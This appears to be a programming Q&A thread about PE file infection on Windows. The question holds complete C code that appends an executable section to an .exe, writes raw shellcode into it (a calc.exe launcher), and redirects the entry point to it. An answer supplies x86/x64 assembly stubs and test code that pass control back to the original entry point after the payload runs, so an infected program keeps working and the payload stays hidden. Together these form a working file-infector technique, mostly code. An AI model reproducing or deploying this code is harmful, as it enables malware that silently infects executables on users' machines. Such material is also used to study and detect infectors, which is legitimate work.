# How to resume the main process after changing the entry point to the newly added shellcode section in the PE file?

Tags: c, windows, winapi, code-injection, portable-executable

I am trying to do PE infection via adding an extra section header at the end of PE file and writing a shellcode in it.

I have added extra section and written the shellcode in it and changed the Original Entry Point (OEP) to the newly added section and it is executing fine; I mean my shellcode is running fine but now I want to resume the main process, and for that I need to again change the modified entry point to OEP. But, I am not able to figure it out. Please let me know if is there any way to resume the main process after executing the shellcode.

And, I have also tried this [blog](https://0x00sec.org/t/pe-file-infection/401), but it is also not working, in that the author has written inline asm code and putted some place holder to restore the OEP during run-time which will embedded dynamically in the shellcode.

I am thinking to write a shellcode which will contain `JMP to_OEP`. However, I am not sure whether it will work or not.

Please suggest me some ways or hints to resume the process after execution of shellcode in PE file.

Code:

```
#include <stdio.h>
#include <windows.h>
#include <stdbool.h>


// returns the DOS Header
PIMAGE_DOS_HEADER GetDosHeader(LPBYTE file) {
    return (PIMAGE_DOS_HEADER)file;
}

/*
* returns the PE header
*/
PIMAGE_NT_HEADERS GetPeHeader(LPBYTE file) {
    PIMAGE_DOS_HEADER pidh = GetDosHeader(file);

    return (PIMAGE_NT_HEADERS)((u_char*)pidh + pidh->e_lfanew);
}

/*
* returns the file header
*/
PIMAGE_FILE_HEADER GetFileHeader(LPBYTE file) {
    PIMAGE_NT_HEADERS pinh = GetPeHeader(file);

    return (PIMAGE_FILE_HEADER)&pinh->FileHeader;
}

/*
* returns the optional header
*/
PIMAGE_OPTIONAL_HEADER GetOptionalHeader(LPBYTE file) {
    PIMAGE_NT_HEADERS pinh = GetPeHeader(file);

    return (PIMAGE_OPTIONAL_HEADER)&pinh->OptionalHeader;
}

/*
* returns the first section's header
* AKA .text or the code section
*/
PIMAGE_SECTION_HEADER GetFirstSectionHeader(LPBYTE file) {
    PIMAGE_NT_HEADERS pinh = GetPeHeader(file);

    return (PIMAGE_SECTION_HEADER)IMAGE_FIRST_SECTION(pinh);
}

PIMAGE_SECTION_HEADER GetLastSectionHeader(LPBYTE file) {
    return (PIMAGE_SECTION_HEADER)(GetFirstSectionHeader(file) + (GetPeHeader(file)->FileHeader.NumberOfSections - 1));
}

DWORD align(DWORD size, DWORD align, DWORD addr) {
    if (!(size % align))
        return addr + size;
    return addr + (size / align + 1) * align;
}


bool AddSection(char *filepath, char *sectionName, DWORD sizeOfSection) {

    HANDLE hFile = CreateFileA(filepath, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

    if (hFile == INVALID_HANDLE_VALUE)
    {
        printf("[-] Cannot open %s\n", filepath);
        return 0;
    }

    DWORD dwFileSize = GetFileSize(hFile, NULL);

    if (!dwFileSize)
    {
        printf("[-] Could not get files size\n");
        CloseHandle(hFile);
        return 0;
    }

    HANDLE hMapping = CreateFileMapping(hFile, NULL, PAGE_READWRITE, 0, dwFileSize, NULL);
    DWORD dw = GetLastError();
    if (!hMapping)
    {
        printf("[-] CreateFileMapping failed\n");
        CloseHandle(hFile);
        return 0;
    }

    LPBYTE pByte = (LPBYTE)MapViewOfFile(hMapping, FILE_MAP_READ | FILE_MAP_WRITE, 0, 0, dwFileSize);
    DWORD dw1 = GetLastError();
    if (!pByte)
    {
        printf("[-] MapViewOfFile failed\n");
        CloseHandle(hMapping);
        CloseHandle(hFile);
        return 0;
    }

    //check signature
    //pDosHeader = (PIMAGE_DOS_HEADER)lpFile;
    PIMAGE_DOS_HEADER dos = GetDosHeader(pByte);
    if (dos->e_magic != IMAGE_DOS_SIGNATURE)
    {
        printf("[-] DOS signature not found\n");
        UnmapViewOfFile(pByte);
        CloseHandle(hMapping);
        CloseHandle(hFile);
        return 0;
    }
    PIMAGE_NT_HEADERS nt = GetPeHeader(pByte);
    PIMAGE_FILE_HEADER FH = (PIMAGE_FILE_HEADER)(pByte + dos->e_lfanew + sizeof(DWORD));
    PIMAGE_OPTIONAL_HEADER OH = (PIMAGE_OPTIONAL_HEADER)(pByte + dos->e_lfanew + sizeof(DWORD) + sizeof(IMAGE_FILE_HEADER));
    PIMAGE_SECTION_HEADER SH = (PIMAGE_SECTION_HEADER)(pByte + dos->e_lfanew + sizeof(IMAGE_NT_HEADERS));

    ZeroMemory(&SH[FH->NumberOfSections], sizeof(IMAGE_SECTION_HEADER));
    CopyMemory(&SH[FH->NumberOfSections].Name, sectionName, 8);
    //We use 8 bytes for section name,cause it is the maximum allowed section name size

    //lets insert all the required information about our new PE section
    SH[FH->NumberOfSections].Misc.VirtualSize = align(sizeOfSection, OH->SectionAlignment, 0);

    SH[FH->NumberOfSections].VirtualAddress = align(SH[FH->NumberOfSections - 1].Misc.VirtualSize, OH->SectionAlignment, SH[FH->NumberOfSections - 1].VirtualAddress);

    SH[FH->NumberOfSections].SizeOfRawData = align(sizeOfSection, OH->FileAlignment, 0);

    SH[FH->NumberOfSections].PointerToRawData = align(SH[FH->NumberOfSections - 1].SizeOfRawData, OH->FileAlignment, SH[FH->NumberOfSections - 1].PointerToRawData);

    SH[FH->NumberOfSections].Characteristics |= IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE;

    SetFilePointer(hFile, SH[FH->NumberOfSections].PointerToRawData + SH[FH->NumberOfSections].SizeOfRawData, NULL, FILE_BEGIN);

    //end the file right here,on the last section + it's own size
    SetEndOfFile(hFile);

    //now lets change the size of the image,to correspond to our modifications
    //by adding a new section,the image size is bigger now

    OH->SizeOfImage = SH[FH->NumberOfSections].VirtualAddress + SH[FH->NumberOfSections].Misc.VirtualSize;

    //and we added a new section,so we change the NOS too
    FH->NumberOfSections += 1;
    SetFilePointer(hFile, 0, NULL, FILE_BEGIN);

    //and finaly,we add all the modifications to the file
    WriteFile(hFile, pByte, dwFileSize, &dw, NULL);

    PIMAGE_SECTION_HEADER first = GetFirstSectionHeader(pByte);
    PIMAGE_SECTION_HEADER last = GetLastSectionHeader(pByte);

    SetFilePointer(hFile, last->PointerToRawData, NULL, FILE_BEGIN);

    // below shellcode will popup calc.exe
    char *str = 
        "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
        "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
        "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
        "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
        "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
        "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
        "\x45\x81\x3e\x43\x72\x65\x61\x75"
        "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
        "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
        "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
        "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
        "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
        "\x6c\x63\x89\xe2\x52\x52\x53\x53"
        "\x53\x53\x53\x53\x52\x53\xff\xd7";     

    // Original Entry Point (OEP)
    DWORD dwOEP = nt->OptionalHeader.AddressOfEntryPoint + nt->OptionalHeader.ImageBase;


    WriteFile(hFile, str, strlen(str), &dw, 0);


    printf("EOP:- %d - %d\n", dwOEP, last->PointerToRawData);

    nt->OptionalHeader.AddressOfEntryPoint = last->VirtualAddress; //- last->PointerToRawData;
    CloseHandle(hFile);
    return TRUE;
}


void main()
{
    if (AddSection("C:\\Users\\xyz\\sample_hello.exe", ".TST", 400))
        printf("Section added!\n");
    else 
        printf("Error writting code!\n");
}
```

Development Environment:

- Windows 10
- Visual Studio 2017 (Community Ed.)

Comment: if you modify `AddressOfEntryPoint` you need save original value of `AddressOfEntryPoint` in shellcode and use this save copy for jump

Comment: @RbMm Yeah, that's what the author of the blog (the link I have already mentioned) has done using some placeholder values and then replacing them with original value. But, I don't know why his code is not working in my environment.
Is there any other way to achieve the same?

Comment: you need not another way, but fix self errors

Comment: Yeah, I can fix errors but to fix errors atleast there should be some errors. I mean 
 the issue is, in writing code from that blog on VS2017, I don't know why LoadLibrary returns NULL but LoadLibrary working fine when writing code in Notepad and then compiling it from "Developer command prompt for VS2017".
I have verified it by writing a sample code for MessageBoxA using LoadLibrary. So, that's why after messing with it for 5 days, I left that approach and decided to implement diff approach and then I have written above code.

Answer (score 0):

for *x86* you need next shellcode:

```
_shcode proc
    nop
    nop
    nop
    call @@0
    DD 0
@@0:
    mov eax,[esp]
    mov edx,[eax]
    sub [esp],edx
    ;------------
    ; your shell code here
    ;------------
    ret
_shcode endp
```

for *x64* next:

```
shcode proc
    nop
    nop
    nop
    call @@0
    DD 0
@@0:
    mov rax,[rsp]
    movsxd rdx,dword ptr[rax]
    sub [rsp],rdx
    sub rsp,32
    ;------------
    ; your shell code here
    ;------------
    add rsp,32
    ret
shcode endp
```

in place *your shell code here* put your actual shell code procedure - you `"\x31\..\xd7"` for example.

key point here `DD 0` field at offset 8 from shell code begin (in both *x86* and *x64*).

let you shell code will be have `RVA` (relative virtual address) in final exe. from another side `AddressOfEntryPoint` is *rva* of original exe entry point. you must write to `DD 0` field the `RVA + 8 - AddressOfEntryPoint`.

- really - let exe will be loaded at `ImageBase`.
- after `call @00` instruction executed in your shell code in stack
  will be pushed return address - the next address after `call @@0` -
  this will be `ImageBase + RVA + 8`.
- so after `mov rax,[rsp]` in `rax` will be `ImageBase + RVA + 8` and
  this is address of original `DD 0`.
- the next `movsxd rdx,dword ptr[rax]`  read to `rdx` the `RVA + 8 -
  AddressOfEntryPoint` (remember this is what we store instead 0, when
  prepare shellcode) (in *x64* we use signed extend).
- and final `sub [rsp],rdx` give `(ImageBase + RVA + 8) - (RVA + 8 -
  AddressOfEntryPoint) = ImageBase + AddressOfEntryPoint`
- so `ImageBase + AddressOfEntryPoint` will be at `[rsp]`
- for *x64* need preserve 32 byte space (stack already correct align at
  this point), for *x86* this is not need
- execute your shell code
- and final `ret` move us to `ImageBase + AddressOfEntryPoint` - to the
  original entry point

let simply test this for self exe. test code is the same for both *x86/x64*

```
extern "C"
{
    void __cdecl shcode(void*);
}

BOOL SimulateWriteSC(ULONG AddressOfEntryPoint, ULONG Rva, PVOID pvShcode)
{
    ULONG op;
    pvShcode = RtlOffsetToPointer(pvShcode, 8);

    if (VirtualProtect(pvShcode, 4, PAGE_EXECUTE_READWRITE, &op))
    {
        *((PULONG)pvShcode) = (Rva + 8) - AddressOfEntryPoint;
        VirtualProtect(pvShcode, 4, PAGE_EXECUTE_READWRITE, &op);

        return TRUE;
    }

    return FALSE;
}

void WINAPI ep(void* Peb)
{
    enum : LONG_PTR { tag = MAXLONG_PTR };
    if (Peb == (void*)tag)
    {
        MessageBoxW(0,0,L"Original Entry Called",0);
    }
    else
    {
        MessageBoxW(0,0,L"We in Shell Code",0);
        if (SimulateWriteSC(RtlImageNtHeader(&__ImageBase)->OptionalHeader.AddressOfEntryPoint, 
            RtlPointerToOffset(&__ImageBase, shcode), shcode))
        {
            shcode((void*)tag);
        }
    }
    ExitProcess(0);
}
```

here the `void WINAPI ep(void* Peb)` is real entry point of exe (use [`/ENTRY:ep`](https://learn.microsoft.com/en-us/cpp/build/reference/entry-entry-point-symbol?view=vs-2017) linker option) . it called with single param - pointer to `PEB`. the `shcode` is already "written" to our exe (i use separate asm file + masm (ml.exe)). need only adjust the `DD 0` field, which i and do in `SimulateWriteSC` i write here `(Rva + 8) - AddressOfEntryPoint;` where `Rva = RtlPointerToOffset(&__ImageBase, shcode)` is *rva* of my shell code and `AddressOfEntryPoint = RtlImageNtHeader(&__ImageBase)->OptionalHeader.AddressOfEntryPoint` - *rva* of exe entry point. so exactly how i describe at begin. and then we call shellcode - `shcode((void*)tag);` - if all correct done - the original exe entry point - `ep` will be called again with passed parameter ( `(void*)tag` in concrete case). we detect this special tag parameter and exit. test is ok